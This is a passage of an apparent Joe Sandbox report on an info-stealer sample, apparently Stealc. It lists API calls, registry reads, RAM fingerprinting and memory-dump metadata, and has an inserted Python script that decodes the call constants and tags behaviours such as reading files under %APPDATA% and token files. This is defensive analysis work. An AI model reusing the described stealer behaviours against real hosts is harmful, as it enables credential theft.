                                     • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Xinvalid_argumentstd::_$std::exception::exception
                                    • String ID: invalid string position$string too long
                                    • API String ID: 3310641104-4289949731
                                    • Opcode ID: e8e94d432b7a225f15906654f8b7d9c1829f75b23fe0b6e7d2fbcf20ece83d96
                                    • Instruction ID: 51061fea9d6b950a5ceb2c5dab3f11a0fa3a6f5ceb09807e3470fe25826be892
                                    • Opcode Fuzzy Hash: e8e94d432b7a225f15906654f8b7d9c1829f75b23fe0b6e7d2fbcf20ece83d96
                                    • Instruction Fuzzy Hash: B421E6323083008BD720DE6CD880ABAB7F5EFE5760B204A2EE55ACB741D770DC408761
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 000C33EF
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 000C33F6
                                    • GlobalMemoryStatusEx.KERNEL32 ref: 000C3411
                                    • wsprintfA.USER32 ref: 000C3437
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                                    • String ID: %d MB
                                    • API String ID: 2922868504-2651807785
                                    • Opcode ID: 60b68b77f2923ff01aba8c0f5a90737bb8830b088772bc378af2066153a2ec9c
                                    • Instruction ID: 3725af8104e6f9e9863db4c80d3859e79d3eb8351496a6995a3553dbf849b52e
                                    • Opcode Fuzzy Hash: 60b68b77f2923ff01aba8c0f5a90737bb8830b088772bc378af2066153a2ec9c
                                    • Instruction Fuzzy Hash: FD01B1B1E14218AFDB14DF98EC49FAEB7B8FB45711F00422AFA06E7380D7749D0086A5
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                     • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: __amsg_exit$__getptdfree
                                    • String ID: Xu$Xu
                                    • API String ID: 2640026729-1328518658
                                    • Opcode ID: c95e3faf95cd2aa39d2fcfc0d4cf103af09fe4c416a47a99d1726422e74ac2c9
                                    • Instruction ID: 471b0cb329fd20c2efb1d7401da8647654b2a4eb3bf8bb56abd59c787793dff8
                                    • Opcode Fuzzy Hash: c95e3faf95cd2aa39d2fcfc0d4cf103af09fe4c416a47a99d1726422e74ac2c9
                                    • Instruction Fuzzy Hash: 5C01F933D46B21A7E761AB699409FDDB3A07F01B10F55000EE88867681DF346D41DFE6
                                    APIs
                                    • RegOpenKeyExA.ADVAPI32(80000001,00E6D228,00000000,00020119,?), ref: 000BD7F5
                                    • RegQueryValueExA.ADVAPI32(?,00E6DFD8,00000000,00000000,00000000,000000FF), ref: 000BD819
                                    • RegCloseKey.ADVAPI32(?), ref: 000BD823
                                    • lstrcat.KERNEL32(?,00000000), ref: 000BD848
                                    • lstrcat.KERNEL32(?,00E6DF48), ref: 000BD85C
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                     • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$CloseOpenQueryValue
                                    • String ID:
                                    • API String ID: 690832082-0
                                    • Opcode ID: 0b92576d94e96efd6540ade151a57e1437a5817640d8a476306243544f8481a5
                                    • Instruction ID: bf191910249d51760a1453bc1df2ead111a2fd212895f93440ffd576baefbf21
                                    • Opcode Fuzzy Hash: 0b92576d94e96efd6540ade151a57e1437a5817640d8a476306243544f8481a5
                                    • Instruction Fuzzy Hash: 56413175A1010CEFCB54EF68EC96FDE77B8AB54344F404065B50997262EE30AE858F91
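The function blocks above list raw API calls with hexadecimal arguments; what turns them into behaviour is decoding the constants the sample passes. The Python script below is an added example, not part of the Joe Sandbox report or of the Stealc sample: it parses call lines in the report's own format (the sample input is constructed from lines copied out of the blocks above), decodes the Win32 constants the stealer uses (the CSIDL passed to SHGetFolderPathA, the HKEY root and KEY_* access mask passed to RegOpenKeyExA, the CreateFileA access/share/disposition values, the LocalAlloc flags) and tags each function with the behaviour the call set implies. The tag names and the small constant tables are this example's own choices; the constant values follow the Windows SDK headers, so 0x1A reads as CSIDL_APPDATA, 0x80000001 as HKEY_CURRENT_USER and 0x20119 as KEY_READ|KEY_WOW64_64KEY.

```python
import re
from collections import namedtuple
# Constructed input: "APIs" lines copied from the function blocks of this report.
SAMPLE_REPORT = """\
APIs
• SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 000BEA24
• lstrcat.KERNEL32(?,000D1794), ref: 000BEA7A
APIs
• lstrcpy.KERNEL32(00000000,steam_tokens.txt), ref: 000BED52
APIs
• CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,000A140E), ref: 000A9A9A
• LocalAlloc.KERNEL32(00000040,?,?,?,?,000A140E), ref: 000A9AC7
• ReadFile.KERNEL32(00000000,00000000,?,000A140E,00000000,?,?,?,000A140E), ref: 000A9AE0
APIs
• std::_Xinvalid_argument.LIBCPMT ref: 000C5B14
  • Part of subcall function 000CA173: std::exception::exception.LIBCMT ref: 000CA188
• memmove.MSVCRT(00000000,00000000,?,00000000,00000000,00000000), ref: 000C5B7C
APIs
• GlobalMemoryStatusEx.KERNEL32 ref: 000C3411
APIs
• RegOpenKeyExA.ADVAPI32(80000001,00E6D228,00000000,00020119,?), ref: 000BD7F5
• RegQueryValueExA.ADVAPI32(?,00E6DFD8,00000000,00000000,00000000,000000FF), ref: 000BD819
"""
# One call line: "• Api.MODULE(arg,...), ref: ADDR"; args optional. Indented "Part of subcall" notes do not match.
CALL_RE = re.compile(r"^•\s*(?P<api>[\w:]+)\.(?P<mod>[A-Za-z0-9]+)"
                     r"(?:\((?P<args>[^)]*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")
# args: int for a hex word, str for a string literal, None for "?"; ref: address of the call site
Call = namedtuple("Call", "api module args ref")
# Windows SDK constants (values as in the SDK headers); the tables are deliberately small.
CSIDL = {0x05: "CSIDL_PERSONAL", 0x1A: "CSIDL_APPDATA", 0x1C: "CSIDL_LOCAL_APPDATA"}
HKEY = {0x80000001: "HKEY_CURRENT_USER", 0x80000002: "HKEY_LOCAL_MACHINE", 0x80000003: "HKEY_USERS"}
KEY_BITS = [(0x1, "KEY_QUERY_VALUE"), (0x2, "KEY_SET_VALUE"), (0x8, "KEY_ENUMERATE_SUB_KEYS"),
            (0x10, "KEY_NOTIFY"), (0x100, "KEY_WOW64_64KEY"), (0x200, "KEY_WOW64_32KEY"), (0x20000, "READ_CONTROL")]
KEY_READ = 0x20019  # STANDARD_RIGHTS_READ | KEY_QUERY_VALUE | KEY_ENUMERATE_SUB_KEYS | KEY_NOTIFY
GENERIC = [(0x80000000, "GENERIC_READ"), (0x40000000, "GENERIC_WRITE"), (0x20000000, "GENERIC_EXECUTE")]
SHARE = [(0x1, "FILE_SHARE_READ"), (0x2, "FILE_SHARE_WRITE"), (0x4, "FILE_SHARE_DELETE")]
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING", 4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}

def _bits(v, table):
    names = [n for bit, n in table if v & bit]
    return "|".join(names) if names else f"0x{v:X}"
def _sam(v):  # registry access mask: the KEY_READ composite first, then any remaining bits
    head = ["KEY_READ"] if v & KEY_READ == KEY_READ else []
    rest = v & ~KEY_READ if head else v
    return "|".join(head + [_bits(rest, KEY_BITS)] * bool(rest)) or "0x0"

# (api, zero-based argument index) -> decoder for that argument
DECODERS = {
    ("SHGetFolderPathA", 1): lambda v: CSIDL.get(v, f"CSIDL 0x{v:X}"),
    ("RegOpenKeyExA", 0): lambda v: HKEY.get(v, f"0x{v:X}"),
    ("RegOpenKeyExA", 3): _sam,
    ("CreateFileA", 1): lambda v: _bits(v, GENERIC),
    ("CreateFileA", 2): lambda v: _bits(v, SHARE),
    ("CreateFileA", 4): lambda v: DISPOSITION.get(v, f"0x{v:X}"),
    ("LocalAlloc", 0): lambda v: "LPTR (LMEM_FIXED|LMEM_ZEROINIT)" if v == 0x40 else f"0x{v:X}",
}
def _arg(tok):
    tok = tok.strip()
    return None if tok == "?" else int(tok, 16) if re.fullmatch(r"[0-9A-Fa-f]{8}", tok) else tok

def parse_report(text):
    """Split the report into per-function call lists, one per 'APIs' heading."""
    blocks = []
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            blocks.append([])
            continue
        m = CALL_RE.match(line)
        if m and blocks:  # anything else (headings, dump metadata, subcall notes) is ignored
            args = [_arg(a) for a in m["args"].split(",")] if m["args"] else []
            blocks[-1].append(Call(m["api"], m["mod"], args, int(m["ref"], 16)))
    return blocks

def decode_call(c):
    """Render one call with known constant arguments replaced by their SDK names."""
    def fmt(i, a):
        if a is None:
            return "?"
        if isinstance(a, str):
            return f'"{a}"'
        return DECODERS.get((c.api, i), lambda v: f"0x{v:X}")(a)
    return f"{c.api}({', '.join(fmt(i, a) for i, a in enumerate(c.args))}) @ 0x{c.ref:X}"

def tag_block(calls):
    """Map a function's call set to the behaviour it implies; the tag names are this example's own."""
    apis = {c.api for c in calls}
    tags = []
    if "ReadFile" in apis and apis & {"CreateFileA", "CreateFileW"}:
        tags.append("reads-file-into-memory")
    if any(c.api.startswith("SHGetFolderPath") and len(c.args) > 1 and c.args[1] in CSIDL for c in calls):
        tags.append("builds-path-under-user-profile")
    if any(a.startswith("RegOpenKeyEx") for a in apis) and any(a.startswith("RegQueryValueEx") for a in apis):
        tags.append("reads-registry-value")
    if "GlobalMemoryStatusEx" in apis:
        tags.append("collects-ram-size")
    return tags + [f"string-arg:{a}" for c in calls for a in c.args if isinstance(a, str)]

if __name__ == "__main__":
    for n, calls in enumerate(parse_report(SAMPLE_REPORT)):
        print(f"function {n}: {', '.join(tag_block(calls)) or 'no tags'}", *map(decode_call, calls), sep="\n    ")
```

Running the script on a full report text (paste the page into `SAMPLE_REPORT` or read it from a file) gives one line per function with its tags, which is enough to see at a glance that the sample builds a path under %APPDATA%, opens files read-only and reads them whole into a zeroed LocalAlloc buffer, reads HKCU values through the 64-bit registry view, and formats total RAM as "%d MB" for host fingerprinting. Trailing arguments such as 000A140E are stack residue the sandbox prints past the real parameter list, so the decoders only name the positions that a given API actually defines.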
                                    APIs
                                    • lstrlen.KERNEL32(00000000), ref: 000B7F31
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B7F60
                                    • StrCmpCA.SHLWAPI(00000000,000D4C3C), ref: 000B7FA5
                                    • StrCmpCA.SHLWAPI(00000000,000D4C3C), ref: 000B7FD3
                                    • StrCmpCA.SHLWAPI(00000000,000D4C3C), ref: 000B8007
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                     • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpylstrlen
                                    • String ID:
                                    • API String ID: 2001356338-0
                                    • Opcode ID: b2db658c18486f3665742af20079b47f3d940eea79e84bc736bff9a1be72abac
                                    • Instruction ID: e7cafee1c61b427fb4487eed2e94bd2e621b51fb5520baca511c82932a938c23
                                    • Opcode Fuzzy Hash: b2db658c18486f3665742af20079b47f3d940eea79e84bc736bff9a1be72abac
                                    • Instruction Fuzzy Hash: 11417F3090411ADFCB20DF68D884EEE77F4FF95340B1141A9E809AB351DB70EA55CB95
                                    APIs
                                    • lstrlen.KERNEL32(00000000), ref: 000B80BB
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B80EA
                                    • StrCmpCA.SHLWAPI(00000000,000D4C3C), ref: 000B8102
                                    • lstrlen.KERNEL32(00000000), ref: 000B8140
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B816F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpylstrlen
                                    • String ID:
                                    • API String ID: 2001356338-0
                                    • Opcode ID: ede2595f98ee915ca4c38eac564dd297dd56e541514c54d520e76a2925e05cc8
                                    • Instruction ID: 223b5753a2e4dfc45a77a9c5cbd282a924006ffb58093e9cdd11dc47c97d8e71
                                    • Opcode Fuzzy Hash: ede2595f98ee915ca4c38eac564dd297dd56e541514c54d520e76a2925e05cc8
                                    • Instruction Fuzzy Hash: 1B419D75601106ABCB61EF6CD988BEABBF8EF44740F10842DA849D7265EF34DD45CB90
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 000C3166
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 000C316D
                                    • RegOpenKeyExA.ADVAPI32(80000002,00E5B8F8,00000000,00020119,?), ref: 000C318C
                                    • RegQueryValueExA.ADVAPI32(?,00E6D488,00000000,00000000,00000000,000000FF), ref: 000C31A7
                                    • RegCloseKey.ADVAPI32(?), ref: 000C31B1
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                    • String ID:
                                    • API String ID: 3225020163-0
                                    • Opcode ID: 0bd9de9ae9e245ef6ebd1ca44d3e36be1005fda186efd8805d5c2dff8c1f4edc
                                    • Instruction ID: 76c9e9299627d6966ba0826ee69db6301223bf7fd8cf6b5cbba1e61a098fdb00
                                    • Opcode Fuzzy Hash: 0bd9de9ae9e245ef6ebd1ca44d3e36be1005fda186efd8805d5c2dff8c1f4edc
                                    • Instruction Fuzzy Hash: 1B113D76A41209AFD710DF94EC49FABBBBCE748B11F00422AFA05A2680DB755D008BA1
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: String___crt$Type
                                    • String ID:
                                    • API String ID: 2109742289-3916222277
                                    • Opcode ID: 7888404c694ee9d650f67b29d71f46f69ca004131a7f9a907d422edb7d2fe0d0
                                    • Instruction ID: 0983c994a09abd77d96756b1da131ef119224a269579eb396c918789e1c189fe
                                    • Opcode Fuzzy Hash: 7888404c694ee9d650f67b29d71f46f69ca004131a7f9a907d422edb7d2fe0d0
                                    • Instruction Fuzzy Hash: 8141C47150479CAEDB318B248D8DFFF7BF89B45704F1844ECE9CA86182E2719A458F20
                                    APIs
                                    • std::_Xinvalid_argument.LIBCPMT ref: 000A8996
                                      • Part of subcall function 000CA1C0: std::exception::exception.LIBCMT ref: 000CA1D5
                                      • Part of subcall function 000CA1C0: std::exception::exception.LIBCMT ref: 000CA1FB
                                    • std::_Xinvalid_argument.LIBCPMT ref: 000A89CD
                                      • Part of subcall function 000CA173: std::exception::exception.LIBCMT ref: 000CA188
                                      • Part of subcall function 000CA173: std::exception::exception.LIBCMT ref: 000CA1AE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmp
